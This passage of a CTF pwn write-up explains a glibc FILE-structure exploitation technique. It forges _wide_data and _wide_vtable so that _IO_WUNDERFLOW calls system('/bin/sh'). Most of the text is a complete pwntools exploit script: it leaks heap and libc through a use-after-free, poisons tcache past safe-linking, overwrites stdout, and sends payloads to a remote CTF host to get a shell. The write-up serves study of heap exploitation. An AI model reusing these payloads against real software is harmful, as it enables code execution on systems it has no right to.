AUTOGDB and g.execute(f'b *{hex(libc_base + 0x59192)}') and sleep(T) # system
r.send(rop)

r.interactive()
r.close()

No validation check on _wide_vtable·

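Even libc-2.41, the latest release at the time of writing, still does not validate _wide_vtable, so this approach still works today.

Without that check, _wide_vtable can point directly at a forged struct _IO_jump_t, with its _IO_WUNDERFLOW slot holding the address of a one_gadget or system.

Here I call system, with the following overlapping layout: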

- 0x08       : system addr
  0x00       : stdout (_flags = '/bin/sh\x00')
+ 0xe0 + 0xe0: stdout - 0x8 - 0x20 (_wide_vtable, so that its __underflow slot at +0x20 lands on stdout - 0x8)
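
To check that this layout really resolves _IO_WUNDERFLOW to system with `/bin/sh` as the first argument, the pointer chasing can be replayed on a toy memory model. This is only a sketch: the two addresses are made-up example values, `resolve_wunderflow` is a hypothetical helper, and the `_wide_vtable` value follows the reference exp (stdout - 0x8 - 0x20).

```python
import struct

UNDERFLOW_SLOT = 0x20    # offset of __underflow in struct _IO_jump_t
WIDE_DATA_OFF = 0xa0     # offset of _wide_data in FILE
WIDE_VTABLE_OFF = 0xe0   # offset of _wide_vtable in struct _IO_wide_data

stdout = 0x7ffff7fa5780  # hypothetical address of _IO_2_1_stdout_
system = 0x7ffff7e12d60  # hypothetical address of system

mem = {}                 # toy memory: address -> 64-bit value

def write_qword(addr: int, value: int) -> None:
    mem[addr] = value

def read_qword(addr: int) -> int:
    return mem.get(addr, 0)

# The overlapping layout described above.
write_qword(stdout - 0x8, system)
write_qword(stdout, struct.unpack('<Q', b'/bin/sh\x00')[0])
write_qword(stdout + WIDE_DATA_OFF, stdout + 0xe0)
write_qword(stdout + 0xe0 + WIDE_VTABLE_OFF, stdout - 0x8 - UNDERFLOW_SLOT)

def resolve_wunderflow(fp: int) -> int:
    """Follow fp->_wide_data->_wide_vtable->__underflow."""
    wide_data = read_qword(fp + WIDE_DATA_OFF)
    wide_vtable = read_qword(wide_data + WIDE_VTABLE_OFF)
    return read_qword(wide_vtable + UNDERFLOW_SLOT)

target = resolve_wunderflow(stdout)              # function that gets called
first_arg = struct.pack('<Q', read_qword(stdout))  # bytes rdi points at
```

Because the call receives `fp` (stdout) as its first argument, the bytes at the start of stdout double as the command string.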

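For a one_gadget, simply replace the system address with the one_gadget address.

PS: I originally wanted to set up this layout right at the entry point, but when _IO_puts reaches _IO_acquire_lock (stdout), execution hangs unless _flags has _IO_USER_LOCK set. Since system needs _flags to hold '/bin/sh\x00', that was not an option. Calling a one_gadget instead might work.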
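
The conflict in this PS can be checked with a few lines of plain Python: `_flags` is the 32-bit field at offset 0 of FILE, and `_IO_USER_LOCK` is the 0x8000 bit. The sketch below is illustrative only, and `skips_locking` is a hypothetical helper name. My reading of the hang is that with the bit clear, puts tries to take the lock through the forged `_lock` field, which is an assumption rather than something the original text states.

```python
import struct

_IO_USER_LOCK = 0x8000  # flag bit defined in glibc's libio.h

def skips_locking(first_qword: bytes) -> bool:
    """True if the first bytes of a forged FILE, read as the 32-bit
    _flags field, have _IO_USER_LOCK set."""
    flags = struct.unpack('<I', first_qword[:4])[0]
    return bool(flags & _IO_USER_LOCK)

# _flags as written by payload1 (0x8000) versus the '/bin/sh' string.
payload1_ok = skips_locking(struct.pack('<Q', 0x8000))
sh_ok = skips_locking(b'/bin/sh\x00')
```

The low 16 bits of `/bin/sh\x00` are 0x622f, so the 0x8000 bit is clear and the string cannot serve as `_flags` at the entry point.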

Reference exp:

from pwn import *
from time import sleep
context.log_level = 'debug'
context.arch = 'amd64' # for flat
context.terminal = ['wt.exe', 'bash', '-c']
T = 0.1

LOCAL = True
AUTOGDB = True
DEBUG = True
if LOCAL:
    env = {'LD_LIBRARY_PATH': '.'}
    r = process('./pwn', env=env)
    if AUTOGDB:
        gid, g = gdb.attach(r, api=True, gdbscript='')
        sleep(1)
        AUTOGDB and g.execute('dir ./src') and sleep(T)
        AUTOGDB and g.execute('c') and sleep(T)
    else:
        gdb.attach(r, gdbscript='dir ./src')
        input('Waiting GDB...')
else:
    AUTOGDB = False
    r = remote('node4.anna.nssctf.cn', 28144)

def add():
    r.sendlineafter(b'Choice: ', b'1')
    sleep(T)

def delete(idx):
    r.sendlineafter(b'Choice: ', b'2')
    r.sendlineafter(b'Idx: ', str(idx).encode())
    sleep(T)

def show(idx):
    r.sendlineafter(b'Choice: ', b'3')
    r.sendlineafter(b'Idx: \n', str(idx).encode())
    return r.recvuntil(b'\nDone', drop=True)

def edit(idx, content):
    r.sendlineafter(b'Choice: ', b'4')
    r.sendlineafter(b'Idx: ', str(idx).encode())
    #r.sendlineafter(b'Size: ', str(size).encode())
    r.sendlineafter(b'Size: ', str(len(content)).encode())
    r.sendafter(b'Content: ', content)
    sleep(T)

AUTOGDB and g.execute('p "leak heap_base"') and sleep(T)
add() # 0
delete(0)
#AUTOGDB and g.execute('b malloc.c:3068') and sleep(T)
heap_base = u64(show(0).ljust(8, b'\x00')) << 12
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
print(f'{hex(heap_base) = }')

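def PROTECT_PTR(ptr):
    # safe-linking: tcache next pointers are stored XORed with (chunk address >> 12)
    return (heap_base >> 12) ^ ptr

edit(0, b'0' * 8) # fill the next field so show() also prints the tcache key behind it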
tcache_key = show(0)[8:]
print(f'{tcache_key.hex() = }')


AUTOGDB and g.execute('p "leak libc_base"') and sleep(T)
for _ in range(8):
    add() # 1 - 8
add() # 9, split top_chunk

for i in range(1, 7+1):
    delete(i)
delete(8)
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
if DEBUG:
    libc_base = u64(show(8).ljust(8, b'\x00')) - 0x21bcc0 # debug
    libc = ELF('libc-2.34-debug-O3.so')
else:
    libc_base = u64(show(8).ljust(8, b'\x00')) - 0x1f2cc0
    libc = ELF('libc.so')
print(f'{hex(libc_base) = }')
libc.address = libc_base


AUTOGDB and g.execute('p "house of some 2"') and sleep(T)
libc_stdout = libc.symbols['_IO_2_1_stdout_']

AUTOGDB and g.execute('p _IO_2_1_stderr_') and sleep(T)
'''
file = {
... ...
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7f27c2b82600 <__GI__IO_file_jumps> <= +0xd8
}
'''
AUTOGDB and g.execute('hexdump &_IO_2_1_stderr_ 0x100') and sleep(T)
'''
+00c0 0x7f853d9dc740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │........│........│ <= stderr.file._unused
+00d0 0x7f853d9dc750 00 00 00 00 00 00 00 00 00 86 9d 3d 85 7f 00 00 │........│...=....│ <= stderr.vtable
+00e0 0x7f853d9dc760 87 28 ad fb 00 00 00 00 e3 c7 9d 3d 85 7f 00 00 │.(......│...=....│ <= stdout
+00f0 0x7f853d9dc770 e3 c7 9d 3d 85 7f 00 00 e3 c7 9d 3d 85 7f 00 00 │...=....│...=....│
'''

assert (libc_stdout - 0x10) & 0b1111 == 0
edit(7, p64(PROTECT_PTR(libc_stdout - 0x10))) # e->key > stderr.vtable (or - 0x20 to _unused?)
AUTOGDB and g.execute('bins') and sleep(T)

add() # 10
add() # 11
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('p &_IO_2_1_stdout_') and sleep(T)

'''
_IO_file_xsputn > _IO_wfile_underflow_maybe_mmap
_IO_file_stat > _IO_new_file_write
'''
libc_IO_wfile_jumps_maybe_mmap = libc.symbols['_IO_wfile_jumps_maybe_mmap']
libc_system = libc.symbols['system']

# copied from @Csome
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload1 = flat({
    0x00: 0x8000, # _flags: _IO_USER_LOCK > disable lock
    0x38: libc_stdout, # _IO_buf_base > read buf
    0x40: libc_stdout + 0x1c8, # _IO_buf_end > read nbytes 0x1c8,
                               # size of _IO_FILE_plus + _IO_wide_data
    0x70: 0, # _fileno > read fd, stdin
    0xa0: libc_stdout + 0x100, # _wide_data > must be a writable address,
                               # otherwise it crashes at fileops.c:717,
                               # decide_maybe_mmap: fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
    0xc0: 0, # _mode <= 0
    0xd8: libc_IO_wfile_jumps_maybe_mmap - 0x18, # vtable: __xsputn slot (0x38) > __underflow (0x20)
}, filler=b"\x00")
payload1 = flat([0, libc_system], filler=b"\x00") + payload1 # stderr._unused2, then system addr at stdout - 0x8 (stderr.vtable)

AUTOGDB and g.execute('b fileops.c:668') and sleep(T)
edit(11, payload1)
AUTOGDB and g.execute('p _IO_2_1_stdout_') and sleep(T)

payload2 = flat({
    0x00: u64(b'/bin/sh\x00'), # _flags > argument string for system(stdout)
    0x08: libc_stdout, # _IO_read_ptr > must be a readable address,
                       # otherwise it crashes at fileops.c:537,
                       # return *(unsigned char *) fp->_IO_read_ptr;
    0x38: libc_stdout, # _IO_buf_base
    0x40: libc_stdout, # _IO_buf_end > read n = 0,
    0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
    0xc0: 0, # _mode <= 0
    0xe0: {
        0xe0: libc_stdout - 0x8 - 0x20 # _wide_vtable > _IO_WUNDERFLOW -> system
    }
}, filler=b"\x00")
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x8dfa8)}') and sleep(T) # system
r.send(payload2)

AUTOGDB and g.execute(f'b *{hex(libc_base + 0x936a5)}') and sleep(T) # ret
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x59192)}') and sleep(T) # system

r.interactive()
r.close()

Summary·

Previous notes·